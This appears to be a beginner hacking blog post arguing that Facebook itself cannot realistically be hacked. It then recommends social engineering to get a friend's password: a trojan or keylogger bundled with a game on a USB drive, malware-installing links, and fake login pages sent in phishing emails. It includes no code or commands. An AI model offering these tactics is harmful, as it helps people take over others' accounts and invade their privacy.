First, because you can't. Well, actually you can, but the high improbability of success makes it stand next toyou can't hack facebook. If you think typing 'hack facebook account' on google, clicking on the first result, and entering the target's email address will give you the password of his/her Facebook account, then you are not on the general level of stupidity, you have achieved an appreciatively high one. Come on, if it were so easy to hack a FB account no one would be using FB to start with. There is so much on our Facebook account that we can't even imagine the consequences if it were to get into the hands of a seasoned hacker, leave alone a novice (not even a novice for that matter) who just searched google for hacking facebook.
impossible, so much so, that I won't be exaggerating in saying that it can't be hacked. As far as the picture on the left is concerned, its one of the many tools offered on the internet, all of which have the following in common-

1. All have very easy user interface. You just have to enter the user id, and click hack.
2. All have download links which will take you to a survey, or some annoying ads.
3. All are 100% not working.

What does 'hacking Facebook' actually mean?

What is the actual meaning of hacking Facebook. Most of us are misguided by the term hacking in general. Hacking incorporates the attainment of someone's password, but hacking is so much more. Account passwords to hacking are just like coins are to the subway surfer game. You get coins along the way, your progress is partially judged on the basis of coins acquired, but the idea is to find your way through the obstacles and keep moving ahead. In general sense, when you use the term hacking Facebook, you mean to understand the functioning of the website, find out about its database management systems, scripts employed, use of cookies, language on which it is built on, etc. Then you find vulnerabilities in the working of the websites, and code exploits to break through the obstacles and gain privileges into their systems, using suitable payloads. The next step would be privilege escalation. For example, you found out a vulnerability that allows you to look into the database and see the email address and cellphone number of any user. You would want to escalate your privileges and also gain access to their passwords. The last step may be setting up a backdoor, for quicker access next time. Another step might be to clear your traces so that you don't get caught. And trust me, you can't do this. I mean you wouldn't be reading a blog on beginner level hacking on Kali Linux if you had so far with web pentesting. So, the conclusion is that hacking Facebook is a real big deal, not everyone's piece of cake (I admit even I'm nowhere close to the level of expertise where I would be playing with databases on Facebook servers). And the Facebook passwords are just a reward that you get after hacking Facebook. But are we missing something? There can't be only one way to get someone's facebook password. I mean we don't want administrator access to all the Facebook databases, just a password of one of the millions of users. There must be a hole somewhere. That kid next door claims he can get Facebook password of anyone, and he's good, but not 'code a exploit for Facebook' good, no, not that good. This is where social engineering steps in.

Social Engineering

With time, the level of security in all fields of life keeps getting stronger. The element of encryption has reached almost unbeatable stage. With 256 bit encryption, cracking will take practically forever. The element of laziness is in our favor (not everyone upgrades to latest security measures), and so is the element of cost-effectiveness and carelessness (you don't picture a nerd kid with glasses next door when you are deciding between WEP and WPA for your password). But nevertheless, things are changing, but one thing remains constant. Humans. Humans in general are stupid. Not really, a better word would be ignorant, not aware of how stuff works. Most Facebook users have no idea about what all Facebook is doing for their accounts security, and how easily their carelessness can ruin each and every one of Facebook's effort to protect their private information.

Humans are the weakest link in any security system

From leaving one's account logged in to not paying attention to someone who's peeping from behind, watching them type their passwords, humans can be really ignorant. But we need not rely on this level of ignorance for passwords (I stopped using the word stupid because it'll definitely annoy and offend people. I mean not good at computers doesn't really mean stupid. They have other stuff to do than protect their accounts). We can very well get the password of an average internet user who is not very paranoid and cynical about stuff. We can't hack Facebook and gain access to their servers, but your friends machine isn't that well guarded. A virus binded with a game he asked you to fetch in a USB drive? An average person won't think that you might have planted a trojan or a keylogger in the USB drive when he takes a file from you. Or maybe send him a link which will silently install some malware in his computer. Many people don't think twice before clicking on a link (some people do, though). Or maybe make a fake login page and send him a professional looking email, directing him to a website where he ends up receiving a login page somehow (you have to make it look real and genuine, backed up by a nice story, that you can expect the target to buy). There are many more methods. As far as the promise for something later in this tutorial about actual Facebook hacking, I have provided you with a small trailer about what you can do, in the next few tutorials we will discuss stuff in detail. The first tutorial is here.

Credential Harvester To Hack Facebook (Phishing)

I don't usually put this disclaimer, but as it was a tutorial that could potentially lead a lot of people on the wrong track (away from the quest on knowledge and towards the quest for illegal hacking and account passwords), here is a warning. Everything on this site is for educational purposes and I won't be responsible for anything you do with this information. If you do something illegal, the jail time would be yours to serve, not mine. So be careful where you are headed.

Read full post »